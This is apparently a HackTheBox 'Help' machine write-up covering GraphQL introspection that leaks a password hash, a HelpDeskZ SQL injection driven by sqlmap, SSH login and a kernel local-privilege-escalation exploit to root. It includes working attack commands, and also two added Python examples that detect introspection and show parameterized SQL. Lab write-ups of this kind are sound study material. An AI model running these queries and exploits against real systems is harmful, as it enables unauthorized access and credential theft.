Help
#Linux #SQLi #API
Help is an easy-rated Linux machine from HackTheBox created by cymtrick. In the current post, my IP is 10.10.14.23, and the target's IP is 10.129.227.176.
I assume that the machine is pretty random, with the version obtainable only from a "readme" whose existence you only know about from git... the URL vulnerable to SQLi is really hidden; I didn't like this machine at all.
Recon
nmap -p- --open -sS --min-rate 5000 10.129.227.176 -vvv -n
Nmap scan report for 10.129.227.176
Host is up, received reset ttl 128 (0.0027s latency).
Scanned at 2023-07-09 02:51:15 UTC for 40s
Not shown: 63200 filtered tcp ports (no-response), 2333 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 128
80/tcp open http syn-ack ttl 128
3000/tcp open ppp syn-ack ttl 128
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 39.72 seconds
Raw packets sent: 196635 (8.652MB) | Rcvd: 40142 (1.606MB)
nmap -sCV -p 22,80 10.129.227.176 -oN Target
Nmap scan report for 10.129.227.176
Host is up (0.021s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
whatweb help.htb
http://help.htb [200 OK] Apache[2.4.18], Country[RESERVED][ZZ],
HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.227.176],
Title[Apache2 Ubuntu Default Page: It works]
Browser: http://help.htb
At this point we have nothing: it is just a web site serving the default index, so the best option from here is to fuzz the target for directories.
wfuzz -c -t 20 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt help.htb/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://help.htb/FUZZ
Total requests: 220546
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000041: 301 9 L 28 W 306 Ch "support"
000001059: 301 9 L 28 W 309 Ch "javascript"
"Support" and "JavaScript": there is virtually nothing here, and we have no credentials or tools to use, so let's explore the other port.
Port 3000

All right, this looks like a taunt; let's extract more information.
$ curl -v http://help.htb:3000/
* Trying 10.129.227.176:3000...
* Connected to help.htb (10.129.227.176) port 3000 (#0)
> GET / HTTP/1.1
> Host: help.htb:3000
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< X-Powered-By: Express
< Content-Type: application/json; charset=utf-8
< Content-Length: 81
< ETag: W/"51-gr8XZ5dnsfHNaB2KgX/Gxm9yVZU"
< Date: Sun, 09 Jul 2023 15:23:28 GMT
< Connection: keep-alive
<
* Connection #0 to host help.htb left intact
{"message":"Hi Shiv, To get access please find the credentials with given query"}
Nothing more from curl; maybe we should fuzz it with a wordlist specific to APIs.
wfuzz -c -t 20 --hc=404 -w /usr/share/wordlists/api.txt help.htb:3000FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://help.htb:3000FUZZ/
Total requests: 584
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000215: 400 0 L 3 W 18 Ch "/graphql"
000000216: 400 0 L 3 W 18 Ch "/graphql/console"
Total time: 0
Processed Requests: 562
Filtered Requests: 560
Requests/sec.: 0
So there is a GraphQL endpoint exposed on the API; now we can use GraphQL-specific techniques such as introspection.
$ curl -s http://help.htb:3000/graphql
GET query missing.
GraphQL is usually queried with POST, so intercept the request in Burp Suite, change the request method to POST, add the header "Content-Type: application/json", and send the first suggested payload (the introspection query).

It works, and you can do the same with curl:
curl -s help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { types { name } } }" }' | jq -c .
{"data":{"__schema":{"types":[{"name":"Query"},{"name":"User"},{"name":"String"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"Boolean"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__EnumValue"},{"name":"__Directive"},{"name":"__DirectiveLocation"}]}}}

We know that there is a "User" type, so now we want to list its fields and dump it.
curl -s help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __type(name: \"User\") { name fields { name } } }" }' | jq .
{
"data": {
"__type": {
"name": "User",
"fields": [
{
"name": "username"
},
{
"name": "password"
}
]
}
}
}
curl -s http://help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ user { username password } }" }' | jq .
{
"data": {
"user": {
"username": "helpme@helpme.com",
"password": "5d3c93182bb20f07b994a7f617e99cff"
}
}
}
We found an email and a password hash (32 hex characters, consistent with unsalted MD5). This should work on the other website, but first we need to crack the hash.
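The introspection and field-dump queries above are also exactly what a defender wants to notice in front of an Express GraphQL endpoint: a production API normally has no reason to answer __schema or __type queries, and a query that selects a password field should never succeed. The following is an added example, not code from the machine or from the original post: a small Python check that classifies a GraphQL request body as introspection, as a request for a sensitive field, or as benign, using the three queries from this section as constructed sample input. The sensitive-field list and the block/alert policy are assumptions made for the example.

```python
import json
import re

# Field names that only occur in GraphQL introspection queries.
INTROSPECTION_FIELDS = {"__schema", "__type", "__typename"}

# Field names a public API should never let a client select. This list is an
# assumption for the example, not something taken from the target.
SENSITIVE_FIELDS = {"password", "passwordhash", "secret", "token"}

# Remove string literals first, so that "User" inside __type(name: "User")
# does not count as a field, and a literal containing "password" is ignored.
_STRING_LITERAL = re.compile(r'"(?:\\.|[^"\\])*"')
_IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def classify_graphql_request(raw_body):
    """Describe a GraphQL HTTP request body (a str holding JSON).

    Returns a dict with keys "malformed", "introspection" and "sensitive".
    A body that is not JSON or has no string "query" member is reported as
    malformed instead of raising, so the check never breaks the request path.
    """
    try:
        query = json.loads(raw_body)["query"]
    except (ValueError, KeyError, TypeError):
        query = None
    if not isinstance(query, str):
        return {"malformed": True, "introspection": False, "sensitive": []}
    names = set(_IDENTIFIER.findall(_STRING_LITERAL.sub('""', query)))
    return {
        "malformed": False,
        "introspection": bool(names & INTROSPECTION_FIELDS),
        "sensitive": sorted(n for n in names if n.lower() in SENSITIVE_FIELDS),
    }


def triage(bodies):
    """Apply a simple policy to each body: block introspection on a production
    API, alert on queries that select sensitive fields, allow the rest."""
    verdicts = []
    for body in bodies:
        info = classify_graphql_request(body)
        if info["malformed"]:
            verdicts.append("malformed")
        elif info["introspection"]:
            verdicts.append("block")
        elif info["sensitive"]:
            verdicts.append("alert")
        else:
            verdicts.append("allow")
    return verdicts


# Constructed sample bodies: the three queries used in this section, plus a
# harmless query and a non-JSON body.
SAMPLE_BODIES = [
    '{ "query": "{ __schema { types { name } } }" }',
    '{ "query": "{ __type(name: \\"User\\") { name fields { name } } }" }',
    '{ "query": "{ user { username password } }" }',
    '{ "query": "{ user { username } }" }',
    "GET query missing.",
]

if __name__ == "__main__":
    for body, verdict in zip(SAMPLE_BODIES, triage(SAMPLE_BODIES)):
        print(verdict.ljust(9), body)
```

The check is deliberately string-based rather than a full GraphQL parser, so it runs with no dependencies and can sit in a proxy or WAF rule; the real fix is to disable introspection in the GraphQL server for production and to keep password hashes out of any type the schema exposes.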


Exploitation
Reverse Shell (Help)
After exploring the website and testing the ticket system, I found nothing... let's just search for "HelpDeskZ GitHub".

searchsploit HelpDeskZ
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload | php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download | php/webapps/41200.py
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
searchsploit -m 41200.py
Edit the Python script: add the line # -*- coding: utf-8 -*- as the first line,
and at line 94 change the session line to session = requests.session()
python2 41200.py http://help.htb/support helpme@helpme.com godhelpmeplz
------------------------------------------
username:
password: sha256()
Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_
try to submit ticket with attachment
OK, we need to submit another ticket with a file attached, then run the exploit again and wait.
In the end it does not work, but at least we now know the URL where the injection happens.
Intercept the download of an attachment and save the request to a file (saved here as "request").

Now run sqlmap on the saved request to extract the password hash.
sqlmap -r request --level 5 --risk 3 -p param[]
This gives us the hash; after cracking it, the password is Welcome1. Log in to the machine through SSH.
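To show what the sqlmap step above is exploiting, here is an added example that is neither HelpDeskZ's code nor part of the original post: it models an attachment-download lookup in Python with an in-memory SQLite table, showing the injectable form that pastes the request parameter into the SQL text next to the hardened form that validates the id as an integer and binds it as a query parameter. The table, columns, rows and e-mail addresses are constructed sample data.

```python
import sqlite3

# Constructed sample data: a minimal stand-in for a help-desk attachments table.
SAMPLE_ROWS = [
    (1, 100, "hdz_invoice.pdf", "alice@example.com"),
    (2, 101, "hdz_screenshot.png", "bob@example.com"),
    (3, 102, "hdz_logs.txt", "carol@example.com"),
]


def build_demo_db():
    """Create an in-memory SQLite database holding the sample attachments."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE attachments ("
        "id INTEGER PRIMARY KEY, ticket_id INTEGER, filename TEXT, owner TEXT)"
    )
    conn.executemany("INSERT INTO attachments VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def fetch_attachment_vulnerable(conn, attachment_id, owner):
    """The injectable pattern: the request parameter is pasted into the SQL
    text, so anything the client sends becomes part of the WHERE clause."""
    sql = (
        "SELECT id, filename FROM attachments "
        "WHERE id = %s AND owner = '%s' ORDER BY id" % (attachment_id, owner)
    )
    return conn.execute(sql).fetchall()


def fetch_attachment_safe(conn, attachment_id, owner):
    """The hardened form: reject anything that is not an integer id, then bind
    both values as parameters so they are only ever compared as data."""
    try:
        attachment_id = int(attachment_id)
    except (TypeError, ValueError):
        return []
    sql = "SELECT id, filename FROM attachments WHERE id = ? AND owner = ? ORDER BY id"
    return conn.execute(sql, (attachment_id, owner)).fetchall()


def compare(attachment_id, owner):
    """Run the same download request through both versions and return the rows
    each one hands back, so the difference can be checked directly."""
    conn = build_demo_db()
    try:
        return {
            "vulnerable": fetch_attachment_vulnerable(conn, attachment_id, owner),
            "safe": fetch_attachment_safe(conn, attachment_id, owner),
        }
    finally:
        conn.close()


if __name__ == "__main__":
    # A legitimate download by the owner: both versions agree.
    print(compare("1", "alice@example.com"))
    # Another user's attachment requested by id only: both refuse.
    print(compare("3", "alice@example.com"))
    # A tampered id: the injectable version returns a row alice does not own,
    # the hardened version returns nothing because the id is not an integer.
    print(compare("3 OR 1=1", "alice@example.com"))
```

The tampered request also shows why the owner check in the vulnerable version gives no protection: the attacker-controlled text is evaluated before the AND, so the ownership condition no longer applies to the injected row. Parameter binding keeps the comparison structure fixed regardless of the value sent.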
$ ssh -l help 10.129.227.176 # Password: Welcome1
$ cat user.txt
4dbb347ce71e1f06251894265c3bdb90
Privileges Escalation
We have the first flag; now we run some basic checks for privilege escalation.
help@help:~$ id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
help@help:~$ sudo -l
[sudo] password for help:
Sorry, user help may not run sudo on help.
help@help:~$ cd /
help@help:/$ find / -perm -4000 2>/dev/null
/usr/sbin/exim4
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
<...>
help@help:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.5 LTS
Release: 16.04
Codename: xenial
help@help:/$ uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
The output of "uname -a" shows an unusually old kernel; searching exploit-db for "Linux Kernel 4.4.0-116" turns up something usable.
Copy the script to /tmp as "exploit.c" (paste it with nano), then compile it with the command gcc -o attack exploit.c
help@help:/tmp$ ./attack
task_struct = ffff88003ba2aa80
uidptr = ffff88003ab0e184
spawning root shell
root@help:/tmp# cat /root/root.txt
62106a044573c82858c99023794af117